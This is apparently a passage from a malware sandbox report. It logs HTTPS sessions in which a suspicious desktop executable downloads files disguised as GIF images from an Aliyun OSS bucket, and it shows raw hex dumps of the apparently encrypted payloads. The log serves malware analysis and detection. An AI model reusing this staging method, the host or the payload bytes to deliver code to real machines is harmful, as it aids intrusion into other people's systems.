WUsXa`e/nnbc\|}~x;9y}QTp\|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o\|PRSTY'xe89-jYkk$P}wtuixyz\|~9~mMtwv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	47.101.26.25	443	6504	C:\Users\user\Desktop\1387457-38765948.15.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-12 03:11:08 UTC	107	OUT	GET /b.gif HTTP/1.1 User-Agent: 3M Host: jcoiw1.oss-cn-shanghai.aliyuncs.com Cache-Control: no-cache
2025-01-12 03:11:09 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sun, 12 Jan 2025 03:11:08 GMT Content-Type: image/gif Content-Length: 125333 Connection: close x-oss-request-id: 678332CC199EDA33380C6125 Accept-Ranges: bytes ETag: "2CA9F4AB0970AA58989D66D9458F8701" Last-Modified: Sat, 11 Jan 2025 10:53:19 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 10333201072197591521 x-oss-storage-class: Standard x-oss-ec: 0048-00000103 Content-Disposition: attachment x-oss-force-download: true Content-MD5: LKn0qwlwqliYnWbZRY+HAQ== x-oss-server-time: 3
2025-01-12 03:11:09 UTC	3550	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-12 03:11:09 UTC	4096	IN	Data Raw: 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19 9a Data Ascii: _X$pdddefg`abc\|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123\|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
2025-01-12 03:11:09 UTC	4096	IN	Data Raw: 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0 dd Data Ascii: mkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
2025-01-12 03:11:09 UTC	4096	IN	Data Raw: 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9 93 Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
2025-01-12 03:11:09 UTC	4096	IN	Data Raw: d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7 90 Data Ascii: ,\|&#&z?JdPJ0z}\|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i\|k}mzf\|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
2025-01-12 03:11:09 UTC	4096	IN	Data Raw: 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4 a1 Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{\|KH
2025-01-12 03:11:09 UTC	4096	IN	Data Raw: 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2 b9 Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n\|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
2025-01-12 03:11:09 UTC	4096	IN	Data Raw: 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d ac Data Ascii: RWrlmnohfjkdefg`abc\|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
2025-01-12 03:11:09 UTC	4096	IN	Data Raw: 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8 14 Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[\|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-wZbjhYklc8wP=0{y}@zvMbrqp
2025-01-12 03:11:09 UTC	4096	IN	Data Raw: 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf 52 Data Ascii: mHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9\|<d?p%~}~jJR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	47.101.26.25	443	6504	C:\Users\user\Desktop\1387457-38765948.15.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-12 03:11:11 UTC	107	OUT	GET /c.gif HTTP/1.1 User-Agent: 3M Host: jcoiw1.oss-cn-shanghai.aliyuncs.com Cache-Control: no-cache
2025-01-12 03:11:11 UTC	545	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sun, 12 Jan 2025 03:11:11 GMT Content-Type: image/gif Content-Length: 10681 Connection: close x-oss-request-id: 678332CFE5C23A39367FC03C Accept-Ranges: bytes ETag: "10A818386411EE834D99AE6B7B68BE71" Last-Modified: Sat, 11 Jan 2025 10:53:19 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 10287299869673359293 x-oss-storage-class: Standard x-oss-ec: 0048-00000103 Content-Disposition: attachment x-oss-force-download: true Content-MD5: EKgYOGQR7oNNma5re2i+cQ== x-oss-server-time: 1
2025-01-12 03:11:11 UTC	3551	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-12 03:11:11 UTC	4096	IN	Data Raw: cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66 39 Data Ascii: bZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E\|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf9
2025-01-12 03:11:11 UTC	3034	IN	Data Raw: 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0 27 Data Ascii: L]y%-/cZ<+Xd}_h48a7?79:dOtLO2/uR& PeY e@lUO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	47.101.26.25	443	6504	C:\Users\user\Desktop\1387457-38765948.15.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-12 03:11:12 UTC	107	OUT	GET /d.gif HTTP/1.1 User-Agent: 3M Host: jcoiw1.oss-cn-shanghai.aliyuncs.com Cache-Control: no-cache
2025-01-12 03:11:13 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sun, 12 Jan 2025 03:11:12 GMT Content-Type: image/gif Content-Length: 3892010 Connection: close x-oss-request-id: 678332D0D2EA3E3335A6B625 Accept-Ranges: bytes ETag: "E4E46F3980A9D799B1BD7FC408F488A3" Last-Modified: Sat, 11 Jan 2025 10:53:29 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 3363616613234190325 x-oss-storage-class: Standard x-oss-ec: 0048-00000103 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 5ORvOYCp15mxvX/ECPSIow== x-oss-server-time: 4
2025-01-12 03:11:13 UTC	3550	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-12 03:11:13 UTC	4096	IN	Data Raw: 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 6f Data Ascii: ;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>\|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V\|o
2025-01-12 03:11:13 UTC	4096	IN	Data Raw: a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f 11 Data Ascii: V(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi\|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
2025-01-12 03:11:13 UTC	4096	IN	Data Raw: 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95 97 Data Ascii: -J;wuwu{}uG`uWu{Q6
2025-01-12 03:11:13 UTC	4096	IN	Data Raw: 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33 79 Data Ascii: 